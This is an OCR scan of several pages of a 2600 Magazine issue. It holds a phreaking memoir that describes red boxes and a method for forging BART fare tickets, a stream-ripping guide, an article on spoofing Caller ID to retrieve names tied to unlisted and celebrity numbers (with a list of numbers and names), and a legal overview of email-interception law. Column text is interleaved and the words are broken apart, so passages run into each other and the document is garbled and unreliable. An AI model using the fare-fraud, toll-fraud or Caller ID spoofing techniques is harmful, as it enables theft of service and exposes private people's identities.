a s i mpl e phase-shi ft osc i l l ator and ampl i fi er
to match the frequency (qu i ckl y determi ned
to be 2200Hz but that i s n' t i mportant) . We
needed a way to gate the tone.
A sma l l str i p of copper was taped wi th ordi
nary cel l o tape i n s uch a way as t o l eave fi ve
stri pes of copper about 8mm wi de exposed.
Th i s formed, wi th conducti ng probe, a
custom swi tch. Wi th just a coupl e of mi nutes
Pa
ge 26
2600 Magazine
of pract i ce it was very easy to exact l y emul ate boxes to what many bel i eve was the Mafi a.
the ti mi ngs. We took t ur ns cal l i ng a fortress Wh i l e not a "sni tch, " Don was hi ghl y cr i ti
phone and compar i ng thei r t one generators ci zed for gett i ng busted for somethi ng few
wi th ours. No discern i bl e di fference! We had of us bel i eved was i l l ega l . He was to be i n
broken the mi ghty fortress wi thi n hours of contact wi th Ron Rosenbaum of Esquire, a
thei r debut. Mil l i ons of dol l ars AT&T spent men ' s magazi ne you'd fi nd next to Playboy
versus one dol l ar's worth of parts. Nothing Ron wanted sensat i on. He managed to tal k to
el se mattered. many phreaks. Whi l e the piece he publ i shed
[Much l ater they thought they got smart i n the October 1 971 edi ti on of Esquire
and i ntroduced 1 700Hz ( somet i mes 1 500Hz) contai ned some bu l l shi t, i t was to l ead t o the
but somehow t hey missed what hackers were fi rst pol i ce " hacker rou ndup." The pi ece was
abl e to do wi th CMOS. We cou l d create al so read on Paci fi ca Radi o's KPFA i n Berkel ey
phase-shi ft osci l l ators as perfect as thei r LI j ust pri or to its rel ease, poss i bl y di rected to
C osci l l ators. Later DTMF and MFc ch i ps the "bl i nd phreaks. " Cr unch pi cked up a copy
became avai l abl e and by repl aci ng the 1 Mhz at l ocal newsstand on hi s way t o San J ose Ci ty
crystal wi t h an LlC osci l l ator, a very cl ose Col l ege and read t he rather l engthy arti cl e
approxi mati on cou l d be obtained. Red and without putti ng i t down. He cal l ed Denny,
bl ue, or " rai nbow" ( named after a drug), boxes the r i ngl eader of the bl i nd phone phreaks,
were popul ar. These chi ps were extremel y and read i t agai n. He apparentl y recorded
expensi ve, but fort unatel y free for me. Much the cal l for other bl i nd phreaks. This was t he
l ater, the 5087 came out for 50 cents. A very end i n one way but al so a new begi n n i ng - a
cheap, no effort red box ! The big quest i on: whol e new defi ni t i on of hacker.
" How much honey or mapl e syrup does it Mysel f, I was caught wi th what was to
take to make a " fortress phone" sound l i ke l ater be known as a " red box, " something
a 6. 5536MHz crystal -based red box? The 2600 woul d cover heavil y al most 20 years
"quarter, " desi gned by a very competent engi - l ater. Because I was a mi nor, news of th i s i n
neer, was to sol ve hal f the probl em. A damn t he USA was very s l i ght. But t hi s di dn't stop
6. 5S36MHz rock was sti l l used, but repl aci ng Canada from publ i shing my name, since i t
that with an LlC ci rcui t made a perfect box. wasn' t i l l egal to publ ish the names of mi nors
Hackers can wi nd coi l s ! Hope you kept your there. I di dn' t l earn u nt i l l ater, but I was to
back issues of 2600. ] become thei r " Crunch" and start a popu l ar
High school finally. The pr i nci pal nat i onal pastime. The red box was s i mpl y a
wel comed the new " cl ass of ' 75" and warned uti l i ty that made using the bl ue box much
the retur ni ng students to be n i ce to us. Si l i con easi er from most of North Ameri ca. Nobody
Val l ey was jU5t begi n n i ng to form out C| the knows where the term " bl ue box" actual l y
l ong establ i shed anchors: Lockheed Aero- came from. The tone generator i n one of the
space, Hewl ett-Packard, and Varian. Our massive "fortress phones" i s red. Actual l y it's
school di stri ct found i tsel f wi t h more money i n a pi nk case, poss i bl y to keep peopl e out?
than it cou l d use. We were bei ng addressed Cl ear l y, red i s mor e manl y.
on a newl y i nsta l l ed cl osed-ci rcuit TV system. Unfortunatel y, my boardi ng school ,
We were tol d there were 2600 students u niversi ty, and much i nformat i on you need to
enrol l ed. Very amus i ng in a somewhat secret understand me has been edi ted out. I don' t
way. even have the space to tel l you about seei ng a
Thi s was goi ng to be an i nteresting and real gymnasium- si zed computer i n 1 974.
{ventfu l year. I was to see H computer for the However, beforE' we move on to the Neth-
fi rst ti me and actual l y use one i n rea l -time. er l ands, I ' m going to outl i ne the thought
The "math resou rce center" had an "ASR33 process t hat was to become my defi n i ng
Tel etype" termi nal i nstal l ed. Thi s connected hack. I broke BART ( Bay Area Rapi d Transi t)
to a central ti meshar i ng mach i ne at 1 1 0 baud. at i t s weakest poi nt: revenue col l ect i on. I t
I t was UNIXI Wh i l e new, UNI X was very easy was al most as s i mpl e as a red box and has
to use. Al l students were wel come to trv the been outl i ned previ ousl y i n these pages.
new equ i pment. Punch cards sti l l r ul e4and The " BART hack" was not the fi rst t i me
"computers i n the cl assroom" were a di stant t i ckets were dupl i cated. Rather, i t was a
dream for most school s . rethi nk on how i t shou l d be done. Tradition-
The summer of 1 971 had someth i ng a l l y, "cri mi nal s" used a l ot of huge, heavy
brewing that was goi ng to forever change the machinery, somet i mes even stol en t i cket
publ ic noti on of " hacker. " A vi rt ual unknown, vendors that weigh nearl y a ton . This was to
Don Bal l anger, got busted for sel l i ng bl ue be an u l tra-s i mpl e portabl e device, wei ghi ng
Spring 2007Page 27
l ess t han hal f a pound, sma l l enough to hol d tour i st fri ends.
i n the pal m of you r hand. Our i ntent was to Amsterdam, 7 990. I di d i t ! Ski pped proba
show the wor l d that a l l "securi ty" coul d be t i on and even tol d my PO I was movi ng. I
defeated for l ess t han $20. On Chr i stmas Eve, thi nk she di dn' t bel i eve me and sai d OK.
we made several hundred $8 t i ckets and j ust ( One l ess on her casel oad?) I won' t go i nto
gave them away to peopl e. These were 1 00 an extradi t i on attempt, but Hol l and tol d them
percent real BART ti ckets ! where to sti ck i t.
I n the ear l y 90s I publ i shed an art i cl e i n I smuggl ed a few i 386s i n and many more
2600 on how to do t hi s. These were the very were to fol l ow. Th i s was the fi rst mi cropro
pl ans the authori ti es were tryi ng thei r best cessor that cou l d even come cl ose to bei ng
to keep out of publ i c vi ew! You must be a a " computer. " I n wi t h L i nux-O. 0 1 . Xeni x was
"hacker" to use them, but wi th a compl ete h i story. The Pent i u m was soon to fol l ow
u nderstandi ng, i t works. I n the case of BART, and whi l e I was to pl ay wi t h Sl ackware and
the card was propri etary, so powdered i ron RedHat, FreeBSD was l ooki ng very ni ce.
gave us the answer. We needed ful l track FreeBSD was soon to be my "onl i ne" system,
8mm card-reader heads. Amazi ngl y enough, t hough I was to earn consi derabl e money for
BART dumped about 50 to a s urpl us shop at port i ng a RedHat di st r i but i on to Al pha, a 64-
the Oakl and ai rport . At 50 cents each i t was bi t pl atfor m.
a bargai n and we bought them a l l . Wi th the I became i nvol ved wi t h Hack-li c Technol
powdered i ron, we determi ned there was ogi es, a spi n-off from Hack- Tc. We sol d, i n
another el ement of obscu ri ty: The domai ns ki t form, t he hardware hacks. Many, l i ke the
were rotated 7. 5 degrees. Demon Di al er and SemaFun ( a pagerlSMS
The Was hi ngton D. C. Metro used the same decoder) were very successful . Hack- Tc was
bogus I BM system as BART ( both exi st to thi s a short- l i ved publ i cati on t hat attempted to
day) . We l i ked to pl ay wi t h BART by addi ng br i ng t he " l ook and feel " of 2600 t o a Dutch
fare to WM t i ckets ! The t i ckets have a matri x- audi ence. I ts downfa l l was mai nl y the fact
pr i nted str i p that shows the user the remai ni ng that it was i n Dutch as wel l as the monster i t
val ue. ( Most t i cket scams are s i mpl y pr i nted created: XS4ALL.
cards sol d to "greedy peopl e.") I f one was No Wi res Needed was a company formed
i nsi de t he system wi th an "overpri nted" card, to compl ete the devel opment of the WLAN
there woul d be some expl ai ni ng to do. So t hi s I i nvented, whi ch started al ongsi de of t he
was t he sol ut i on: We wou l d make a magnet i c BART hack i n 1 985. Di gi Cash was the hol di ng
stri pe card ( a used BART t i cket wi t h fi ve cents company for t he i l l -fated software patent
remai n i ng) wi th a val ue of (then) $7. 95, i nsert about a l l el ectroni c payments and al so t he
i n t he "add-fare machi ne," add fi ve cents, most i ncredi bl e col l ect i on of top peopl e one
and voi l a, a real BART i ssued $8 t i cket! The cou l d i magi ne. Al l t hese patents are expi red
$7. 95 we recorded on the t i cket that sai d today and everythi ng havi ng to do wi t h
fi ve cents remai ned was automat i cal l y wi ped " I nternet payments" i s " pr i or art . " Di gi Cash
and no one was the wi ser. Th i s was for real devel oped the smart cards we use (every
and certai nl y not a scam. Thi s was to be my where except the USA) . Sadl y the banks fel t
"ti cket t o fame and fort une. " " Cri me" pays: threatened and Di gi Cash fol ded.
Can it be made any cl earer? Because I was foundi ng Dutch compani es,
Whi l e there was absol utel y no cri mi nal I needed t o become l ega l . The Vreemdel i n
i ntent, t he BART pol i ce ( gl ori fi ed "rent-a-pi g" genpol i t i e (they normal l y deal wi t h "peopl e
types) di dn' t th i n k i t was very funny. Thi s u l t i - of col or") t hought i t was al l a bi g j oke. I was
mat el y forced me to l eave the USA, whi ch I tol d to "do nothi ng" and l et the case go to
di dn' t t hi nk was so funny ei ther at t i me, but court. Th i s whi te boy from the USA had a
was to be my " l ucky break. " 1 00 percent chance of wi nni ng. (Yes, these
Flash to the end of the " Cold War. " I t was are extreme ri ght-wi ng fasci sts. ) Thank you
l ate i n 1 989 and I was tel l i ng my coworkers Hanneke for you r hel p.
t hat the Berl i n Wal l was comi ng down. They To be a hacker i s to devote your l i fe to
a l l thought I was nuts. Less t han a week l ater what shou l d be obvi ous. We are not "cr i mi
i t happened. My pl ans wi thout hesi tat i on nal s" and wi l l fi ght tooth and nai l t o get t hem
were t o move to Europe. off our I nternet. We are fi ght i ng a batt l e that
East Berlin, 3 7 December 7 989. Th i s was i ncl udes Wi ndows, the root of a l l evi l , al ong
s ure to be the bi ggest party i n the wor l d and wi t h what has become of the fatefu l deci
i t di dn' t di sappoi nt . I had been "swal l owed" si an to make I nternet avai l abl e to l ow-end
by Europe and separated from my Ameri can computer systems. The evi l s i mpl y mounts,
Page 28 2600 Magazine
but note it wi l l be hackers, not pol i t i ci ans,
that sol ve the probl em. Sure, " puppets gal ore"
wi l l take credi t. They owe thei r exi stence to
us. We can " pu l l the pl ug" - what i s a " Bush
Monkey" t o do?
The bas i c evi l of today' s I nternet i s more
t han j ust Mi crosoft - the " mi ddl e- cl ass OS. "
1 M, spam, spyware, worms, Troj ans, soci al
networks onl i ne, and much more are di rectl y
a res ul t of peopl e and thei r dumbed-down
" OS. " Far deeper, the root of these evi l s trul y
have been wi t h us l onger t han most peopl e
have known about the I nternet. I n 1 989
we got I RC, an i mproved form of the si l l y
"Compuserve CB" ( ta l k) . It was fi ne unt i l i t
di ed a strange death around 1 994. Today
we have "soci al onl i ne networks," maki ng
I RC one of t he more t ame computer games.
by Evi l Brak
evi l brak@yahoo.com
Mi crosoft has been very anal when i t
comes to streami ng medi a and has rel eased
l i ttl e i nformati on on t hei r streami ng
protocol , MMS ( Mi crosof Medi a Server) .
Ri ppi ng streams is strai ghtforward but t i me
cons umi ng. Al l you need i s Wi ndows Medi a
Pl ayer ( cal l ed WMP from now on) , a program
cal l ed SOP Mul t i medi a (downl oadabl e from
http: //sdp. ppona. com/), and the l ocati on of
the stream you want to down l oad.
Fi rst, what you need to do i s get the URL
of the stream's ASX fi l e. Gett i ng access to
the URL di ffers dependi ng on whi ch si te the
stream i s on. Most si tes embed the vi deo
i nto the web page i tsel f. Look for a "Launch
Exter nal Pl ayer" button somewhere on t he
page; usual l y th i s wi l l open a new browser
wi ndow wi th the LRL of the ASX fi l e or i t ' l l
open up WMP ( the URL of the fi l e can be
found i n the pl ayl i st) . I f there i s no "Launch
Exter nal Pl ayer" button, then vi ew t he source
of the page and l ook for the URL to the ASX
fi l e. Once you have the URL, copy and paste
i t i nto SOP. If you l i ke you can save the ASX
fi l e to you r computer. Th i s is hel pfu l si nce
"Onl i ne fri ends" i s somet hi ng for mature
audi ences, such as the a l l UNI X I nternet ( ol d
I RC) . When mi nds are bei ng weakened, Vt
don ' t need any more of t hi s swi l l .
As real hackers we sol ve probl ems, whi l e
the l aw and pol i t i ci ans onl y make matters
worse. A techn i cal sol ut i on to every probl em
on the net i s i n order. Put very s i mpl y: Hasta
l a vi sta, pretenders ! Stop cryi ng and _tl
hacki ng.
Bill Squire to this day works with anything
technical. Don ' t call him a "consultant. "
That will insult him. He likes to travel long
distances: in the winter to "warmer places "
and in the summer he prefers a more tech
nologically-oriented tour. There are always 5C
many people to meet.
you have a di rect l i n k to the stream and you
won't have to navi gate t hrough the websi te
to get to i t.
Next, open up SOP and cl i ck on OpeH.
I n the box that pops up, paste the URL of
the ASX fi l e. I f you saved the ASX fi l e, then
ei ther paste the path or browse to i t. Cl i ck on
OK and the pl ayl i st wi l l open up i n the LJ RL's
combobox. Sel ect the fi l e you wi sh to down
l oad, then cl i ck on Go. Choose where you
want the fi l e to be saved. SOP saves audi o
i n ASF format and vi deo i n WMV format.
I f you wi sh to convert to a di fferent format
( e. g. , MP3 and MPG) then Googl e around for
converters. There are pl enty to choose from.
SOP wi l l downl oad the stream as it pl ays
and therefore a prerecorded ten mi n ute vi deo
wi l l take roughl y ten mi nutes to downl oad,
dependi ng on server l oad. L i ve streams down
l oad at the same rate as prerecorded streams
but wi l l conti nue downl oadi ng u nt i l you
cl i ck on Abort. You can l i sten to or watch the
stream whi l e you downl oad by cl i cki ng on
Preview. Another feature of SOP i s the VCR.
You can set start and stop t i mes to record
you r l i ve stream. For exampl e, my l ocal radi o
stati on has i ts own stream and i f I l i ke I can set
Spring 2007Page 29
SOP to start recordi ng at 5 am and fi ni s h at 1 0
am so I can l i sten to the morni ng show when
I want. I can l eave my computer u nattended
and SOP wi l l record wi th no user i nteracti on.
Pretty cool , huh?
There are many di fferent ways t o down
l oad streami ng content and t hi s i s the way I
by Natas
natas@oldskoolphreak.com
What exact l y is backspoofi ng? Most
peopl e readi ng thi s art i cl e probabl y have
never heard of the term "backspoofi ng" before
and don ' t know that the term was coi ned
somewhat recent l y by a fel l ow phone phreak
named NotTheory. Backspoofi ng is a very
s i mpl e, but useful techni que. Essent i al l y, it i s
j ust cal l i ng yoursel f wi t h spoofed Cal l er 1 0 for
the purpose of gett i ng t he CNAM ( Ca l l er 1 0
Name) associ ated wi th a part i cul ar number.
The number you spoof as you r Cal l er 1 0 i s
t he number that you want t o recei ve Cal l er
1 0 name i nformat i on for. I bel i eve that t hi s
wi l l work wi t h al most any 1 0 di gi t number
wi t hi n North Ameri ca. To do t hi s proper l y
you us ua l l y need to be cal l i ng a POTS l i ne,
because POTS l i nes are the onl y ki nd of l i nes
that offer Cal l er 1 0 wi th name, not j ust Cal l er
1 0 number. However, some Vol P provi ders
these days are now offer i ng Cal l er 1 0 name
servi ce to compete wi th a l l t he features avai l
abl e on tradi t i onal POTS l i nes. I t shou l d al so
be noted that cel l phones do not provi de
Cal l er 1 0 wi t h name on i ncomi ng cal l s and
probabl y never wi l l , as the name al ways
tends to be retri eved from the l ocal database
on t he phone.
How does backspoofi ng work? How i s the
CNAM retri eved from a number? Wel l , when
you spoof you r Cal l er 1 0 to a tel ephone l i ne
wi th Cal l er 1 0 name, what happens i s the
recei vi ng tel ephone swi tch does a l ookup
use. I thought I 'd share t hi s method wi th you
a l l s i nce I have met many peopl e who do not
know how to down l oad streams. I encourage
you to pl ay around wi th both WMP and SOP.
You mi ght fi nd a more effi ci ent way of down
l oadi ng streams. Enj oy!
i n what i s known as a CNAM database vi a
t he SS7 ( Si gnal i ng System 7) protocol . Thi s
recei vi ng swi tch di ps i n and retr i eves the
name associ ated wi t h t he part i cul ar number
from the CNAM database and di spl ays i t on
you r l i tt l e Cal l er 1 0 box. Now you mi ght be
aski ng why th i s i s the l east bi t i nterest i ng or
how i t' s useful . Wel l , i t' s extremel y usefu l
because it al l ows you to see i nformati on
that may otherwi se be pri vate. The tel ephone
compani es fi gure that even i f you ' re some
bi g shot movi e star or even i f you have an
u n l i sted number, the person recei vi ng you r
cal l s shoul d sti l l be abl e t o see t he name and
the number of the person cal l i ng. After al l ,
t hat ' s why they' re payi ng for Cal l er 1 0. So the
tel co puts you r name and number i n t hei r
enor mous database t hat ' s constant l y bei ng
updated. Even u nl i sted numbers wi l l typi cal l y
come back wi th a fi rst and l ast name if it can
a l l fi t i nto the 1 5 character space desi gned for
the Cal l er 1 0 name. Thi s a l l works because
you ' re tri cki ng the Cal l er 1 0 servi ce i nto
l ooki ng up the CNAM i nformati on associ ated
wi t h the tel ephone number of you r choos i ng.
1 l i ke to thi n k of these CNAM databases as a
pri vate reverse l ookup di rectory!
At fi rst backspoofi ng may not seem l i ke
t he best t hi ng i n the worl d, but t here are l ots
of appl i cabl e uses for somethi ng l i ke t hi s,
especi al l y if you ' re a phone phreak! Ever
fi nd a l ocal " el evator n umber?" The ones that
connect you to the phone i nsi de an el evator,
al l owi ng you to l i sten i n on the el evator or
Pge 30 2600 Magazine
speak to the peopl e i nsi de? Wel l . . . by back
spoofi ng an el evator number you can see
what the name comes back as. Usua l l y thi s
i s t he name of t he company whose PBX the
el evator number i s on or the company that
occupi es the bui l di ng that the el evator i s i n .
Now a l l you wou l d have t o do i s l ook up the
company' s address and fi nd out where the
bui l di ng i s and you can fi nd out exactl y what
el evator you ' re l i steni ng to! Thi s actual l y
came i n extremel y handy for me. For about
fi ve years now, I ' ve had el evator numbers
that were supposedl y at Brown Un i versi ty
but I was never real l y s ure. By s i mpl y back
spoofi ng the number I was abl e to confi rm
thi s wi th i n a few seconds.
Tel co test numbers are some of the
greatest th i ngs to backspoof, because even
test numbers have CNAM entri es most of
the t i me. When I fi rst started hackspoofi ng,
I assumed test numbers wou l d have di screet
l i st i ngs, but oftenti mes they l i st the tel co's
name or even a l i ttl e descr i pt i on about
the number! Someone even showed me a
modem that came back as " NET 5- ESS" whi ch
i s a tel ephone swi tch made by Lucent. So
i t was pretty obvi ous what turned out t o be
connected t o t hat modem! I f you ' re doi ng
a scan and you ' re not s ure who a part i cul ar
modem bel ongs to, backspoofi ng comes i n
very handy! I al ways l i ke t o see what mi l l i
watt numbers, and other numbers around the
mi l l i watt number, come back as. Maybe you
have some numbers to your tel co and you ' re
wonderi ng exactl y what bureau the number
bel ongs to? Backspoofi ng can somet i mes tel l
you if you' ve reached RCMAC, the swi tch
room, MLAC, I nformati on, or the code for a
part i cul ar wi re center.
Al so, you can see j ust how l azy tel cos
are and how l ong some test numbers have
been the same, because I ' ve found entri es
wi t h ol d tel ephone company names that are
l ong gone! When was the l ast t i me you saw
" NYNEX" or " NEW E NGLAND TEL" cal l i ng
you? ! These compani es di tched those names
years ago, but there are sti l l pl enty of CNAM
entri es out there wi th those names.
Cel l phone numbers are no excepti ons
t o ru l es of backspoofi ng ei ther! T-Mobi l e
currentl y enters thei r customers' names i nto
CNAM databases. I bel i eve Spri nt is now
start i ng to do the same. So if you ' re l ooki ng
for a famous cel ebri ty' S cel l phone number
and you know they' ve got a T-Mobi l e account,
backspoofi ng can come i n very handy. Try
backspoofi ng an ent i re T-Mobi l e exchange
served out of the Hol l ywood Hi l l s and see
how many famous names you recogni ze!
Beware that al l CNAM provi ders are not
equa l ! There are l ots of di ferent CNAM data
bases i n use, and wh i l e most of t he i nfor
mati on is the same, some databases have
confl i ct i ng i nformati on. I t may j ust be that
some databases are not updated as frequent l y
or i t may j ust be that a certai n one sucks and
contai ns l ots of outdated ent r i es. I ' ve found
CNAM entri es t hat were di fferent, dependi ng
on the carri er who provi ded my Cal l er I D
name servi ce. I woul d get one res ul t wi th
Veri zon and another wi th AT&T There real l y
i s a l ot of funky stuff that goes on i n t he wor l d
of CNAM.
To cl ose the art i cl e, I want to show you j ust
how cool backspoofi ng i s. I ' ve put together a
l i st of some of t he most i nterest i ng exampl es
whi ch I ' ve found t hrough backspoofi ng. Keep
in mi nd that phone numbers do change qu i te
often, so unfortunatel y some of these exam
pl es may be gone by the ti me thi s art i cl e
comes out.
" BROWN UNIVERSIT " <4 0 1 8 6 371 27>
" USG-FBI " <3 1 0 4776 5 6 5>
U S GOVERNMENT " <50 1 3 2 4 6 2 4 1>
" CIA, INTERNATION" <5 0 879 8 2 6 93>
" FAA-ONTARIO ATC " <9 0 9 3 9 0 9 9 5 3 >
" BOOZE " <9 0 9 975 0 0 5 0>
" NEW CENTURY TIT " <9 0 9 9 370 0 2 0>
" UNITED , NUDE -TE " <2 1 2 274 9 9 9 8>
" SPRINT PAYPHONE " <70273 1 9 9 00>
" 2 8 8 8 1 " <3 1 0 9 2 6 5 1 0 1>
" A, T &T " <6 172271 067>
" BELL ATLANTIC A" <5703 870 0 0 0>
" OFC# 8 97 TEST L " <8 0 2 8 979 9 1 2>
" ROCH TEL" <5 8 5 2 2 5 9 9 02>
" PACIFIC BELL " <3 1 0 8 5 8 0 0 0 0>
" VERI ZON RC C9 " <9 0 9 3 9 0 0 0 0 8>
" GTC RC WCH3 BC " <9 0 9 3 9 0 0 0 0 6>
" GTC RC E 1 4 0 BC " <9 0 9 3 9 0 0 0 37>
" GTE WC XXXX " <9 0 9 974 0 0 1 0>
" PYRAMID , TELECOM" <50 879 8 9 9 2 0>
" VERI ZON , INFORMA" <50 879 8 9 974>
" VERI ZON , GNI " <5 0 875 6 9 9 1 3>
" VERI ZON " <6 3 1 6 6 8 9 9 0 6>
" NYNEX, " <5 0 879 8 0 0 8 1>
" NEW, ENGLAND TEL" <50879 8 9 9 87>
" BELLSOUTH " <70 6 6 679 9 2 3>
" T-MOBILE " <70 66679994 >
" SWBT " <3 1 4 2 3 5 0 475>
" SWB " <3 1 4 9 6 6 1736>
" QWEST MESSAGING" <5072 859 2 1 6>
" VACANT " <978 4 4 6 8 972>
" UNCLAIMED MONEY " <4 1 0 4 6 4 1 276>
Shouts: The DDP Not Theor) Nick84,
Decoder, Lucky225, Doug, Majestic, IcOn,
GreyArea, Mitnick, Agent Steal, Poulsen,
StankDawg, Dual, Cessna, Vox, Strom
Carlson, IBall, Av l d. The revolution will be
digitized!
Spring 2007Page 31

~-~~=~~~-----. .
' ----------o;Uex-M, Esq:--------
set of l aws, commonl y known as the Wi retap
lex@successful seasons.com
Act or the El ectroni c Communi cati ons Pri vacy
I ' ve gi ven a few tal ks at hacker conferences
Act ( ECPA) that deal wi th EC i n transi t .
and there are a l ot of mi sconcepti ons about
"Storage" here i s what attorneys cal l a
the l aws that govern what we ca

and ca

' t
"term of art," whi ch means t hat i t does n' t
do. Whi l e most l egal i ssues are di scussed I n
mean what you thi n k i t means. Storage u nder
art i cl es l onger than an enti re copy of 2600,
the SCA i ncl udes any t i me the EC stops, even
I ' d l i ke to gi ve a qui ck overvi ew on readi ng
for a mi crosecond. Consi der th i s hypothet
ema i l - can you read other peopl e' s, and who
i ca l : I ema i l thi s art i cl e to 2600. My ema i l
c a n read yours?
server hol ds onto the emai l whi l e i t fi gures
/O/C. thi s i s not l egal advi ce. Whi l e I am
out how to route i t. I t ' s i n storage, i f onl y for
an attorney, I ' m not your attorney. I ' m goi ng
a tenth of a second, so i t ' s covered by the
to tal k about u. s. Federal l aw, namel y the
SCA. The emai l server breaks i t i nto packets
Stored Communi cati ons Act and the Wi retap
and sends i t to i ts upstream router. Now the
Act. Many U. S. states have thei r own l aws
packets are " i n transi t" unt i l they make i t o
on t hi s topi c that mi rror Federal
.
l aw or wor
.
k
the router. The packets are i n storage when I n
s l i ght l y di fferentl y. Other countri es have thei r
t he router ' s memory. They' re al so i n storage i f
own l aws, and i t seems t hat the u. S. govern-
I have my ema i l cl i ent save sent ma .
ment does n' t even fol l ow t hei r own. If you
Yup, "EC" i s a vague term too. Si nce ECs
have any questi ons about speci fi c facts or
aren' t defi ned by the SCA, any new method of
you r own case, contact an attorney. That sai d,
di gi tal communi cati on i s l i kel y to be covered.
l et ' s have some fun.
Messages on BBSes, web foru ms, emai l , I Ms,
The Stored Communi cati ons Act ( SCA)
pages, and cel l phone text messages have
bars unaut hori zed peopl e from i ntenti onal l y
al ready been r ul ed to be covered by the
access i ng an "el ectroni c

mmuni ca
.
ti on
SCA.
servi ce fac i l i ty." I t al so prohi bi ts authOri zed
Si nce the outcome of many l egal i ssues
users from exceedi ng thei r granted access
depends on who you are and what you're
and obtai ni ng, al teri ng, or prevent i ng the
doi ng to whom, the fol l owi ng chart shou l d
del i very of another's el ectroni c communi ca-
hel p.
t i on ( EC) t hat i s i n storage. There' s a second
Who are you? Whose EC are you looking at? P 1 0K?
Yup ( 1 )
Yup ( 2 )
Nope ( 3 )
Maybe ( 4 )
Maybe ( 5 )
Maybe ( 6 )
Intended recipient
Inadvertent recipient
Intentional recipient
Email provider ( public )
Email provider ( private )
Police
Yours
Someone else ' s
Someone else ' s
User ' s
User ' s
Someone else ' s
( 1 ) . The i ntended reci pi ent can al ways
read thei r own stuf, at l east under the SCA.
(2 ) I f you get an i ncorrectl y addressed
emai l , or i f you r emai l system mi sroutes
someone el se' s ema i l to you. you . re OK. as
l ong as you di dn' t do anythi ng to get that
ema i l . Mi nd you, i f you asked someone el se
to get you the ema i l , and nei ther of you are
authori zed to see i t, i t ' s not i nadvertent .
( 3) If you i ntenti onal l y exceed your granted
permi ssi ons and acc

ss or

di fy someone
el se' s EC wi thout thei r permi ssi on or prevent
Pge 32 2600 Magazine
them from gett i ng i t, you've vi ol ated the SCA
and are potenti al l y up to one year i n pr i son
and fi nes, or fi ve years i f you do i t for profi t or
"mal i ci ous destruct i on". Here's the fun part:
The l aw i sn't qui te s ure what "exceeds autho
r i zed access" means yet.
|4),| ) A provi der of an " el ectroni c commu
ni cati ons servi ce" or t hei r workers can l ook at
ECs stored on thei r systems. Provi ders who
offer thei r servi ce to the publ i c, such as I SPs
or cel l phone compani es can ' t di vul ge the
contents of ECs, except to del i ver the message
to the reci pi ent, or when served with a val i d
subpoena or search warrant . Al so, a publ i c
provi der may forward an EC t o t he pol i ce i f
they bel i eve i t contai ns an i mmi nent threat of
seri ous physi cal harm to another, and that the
provi der i nadvertentl y noti ced the threat.
A pri vate provi der, such as a u ni versi ty or
busi ness that offers emai l onl y to thei r workers
may be abl e to di vu l ge the contents of emai l s i f
they want to. I t ' s a gray area, whi ch i s why l ots
of empl oyers make you si gn a rel ease when
they gi ve you an account on thei r systems.
That way they're protected ei ther way.
(6) The pol i ce can acqu i re the contents
of ECs wi th a val i d search warrant, whi ch
requi res t hat there i s probabl e cause t hat t he
emai l s are evi dence of a cr i me. The pol i ce can
al so read ECs i f the reci pi ent al l ows them.
So what exactl y is a "provi der" u nder
these l aws? Whi l e i t' s not expl i ci t l y defi ned
i n the l aw, the common l aw system (what the
U. S. uses) al l ows j udges to l ook at previ ous
court cases t o gu i de them. So far, i f you own
the servi ce and deci de i f others get to use i t,
you ' re a provi der. So if you r un a l i nux box
and gi ve your fri ends or empl oyees mai l
accounts, you ' re a provi der. I f you l et anyone
use the system for a fee, you may be a "publ i c
provi der. "
What About Snifing?
What happens i f you don ' t get thei r
commun i cat i ons from storage, but sn iff i t from
the wi re or from wi rel ess? I n most states, the
seA no l onger concerns you . However, the
Wi retap Act does come i nto pl ay. I ntercept i ng
ECs wi thuut aut hor i zdt i on by t he r eci pi ent or
l aw may res ul t i n up t o fi ve years i mpr i son
ment, open you up t o ci vi l sui t by the vi cti ms,
and a fi ne. The "aut hori zat i ons under l aw" i s
an i nterest i ng l i st. You can l ook at I:Cs on t he
networ k i f you :
!. Get permi ssi on from the reci pi ent of
the EC.
EC.
2. Are the i ntended reci pi ent of the
J . Are i ntercept i ng trans mi ssi ons
i ntended for the general publ i c, persons,
s hi ps, or ai rcraft i n di stress, pol i celfire/emer
gency, CB band, or amateur radi o. Note:
encrypted transmi ssi ons are not consi dered
"for the publ i c".
4. Are i nvest i gati ng a source of
"harmfu l i nterference" to aut hori zed radi o or
consumer el ectroni cs, as l ong as the i ntercep
t i on i s onl y to determi ne the source.
5. Are an empl oyee of the FCC i f i nter-
cept i ng EC is wi thi n t hei r job descri pti on.
6. Are a provi der of an el ectroni c
communi cati on servi ce and t he i ntercepti on
i s:
a. Necessary to provi de the servi ce or
b. Necessary to protect the ri ghts or prop
erty of the servi ce or
c. To compl y wi th a court order or wi retap
warrant.
d. Empl oyees of the above can be protected
u nder the "provi der" excepti on if the i nter
cepti on is wi thi n t hei r j ob descr i pt i on.
There' s some other stuff about al l owi ng
t he Presi dent ( and hi s empl oyees) t o conduct
forei gn i ntel l i gence, but what that means i s n' t
goi ng t o get fi gured out for a whi l e.
What ' s i nterest i ng i s t hat "provi ders" are
al l owed to do a l ot more wi th ECs when
they' re i n storage than when they' re bei ng
transmi tted. That may be changi ng soon.
There' s a recent court ru l i ng t hat seems to
l i mi t what provi ders can do wi th ECs on thei r
systems.
To Recap
You can read you r own mai l . I f someone
sends you stuff by mi stake, you can read i t . I f
you break i nto someone el se's server, you're
in troubl e. I f you're al l owed in the server, but
get root by some nefari ous means, or guess
your ex-gi r l fri end's Hotma i l password to read
t hei r mai l , you're in troubl e. I f you want to test
out a sni ffer, get permi ssi on from the owner of
the network.
There are some gray areas i n the l aw, such
as who can grant permi ssi on to vi ew ECs and
what consti tutes permi ssi on. Does l ett i ng a user
sudo gr ant permi ssi on to redd ot her peopl e's
stuff? I f I gi ve my root l ogi n to someone el se
and they read your emai l , di d I grant permi s
si on to do i t? Al l t hese are i nterest i ng ques
t i ons and they haven't been answered by the
courts yet. lIcourse, every one of these ques
t i ons wi l l have to be answered by a rpal case,
wi t h vi ct i ms And defendants. Nohody wants
to be a test case.
Be carefu l out t here. I f you ro get busted
or sued, keep you r mouth s hut and tal k to a
l awyer.
Spring 2007Page 33
Dear 2600:
I have some observati ons that I woul d l i ke to
submi t for your approval and potent i al publ i ca
t i on. After noti ci ng the "Wri ters Wanted" text bl ock
on Pge 50of 2J. 3, I have deci ded i t i s my t i me to
contri bute to the cause.
Most of the mater i al that I have i s based upon my
work. I am present l y a contract tel ecommuni cati ons
techni ci an wi th experi ence i n carri er-cl ass transport,
some swi tchi ng, data networks, and access devi ces.
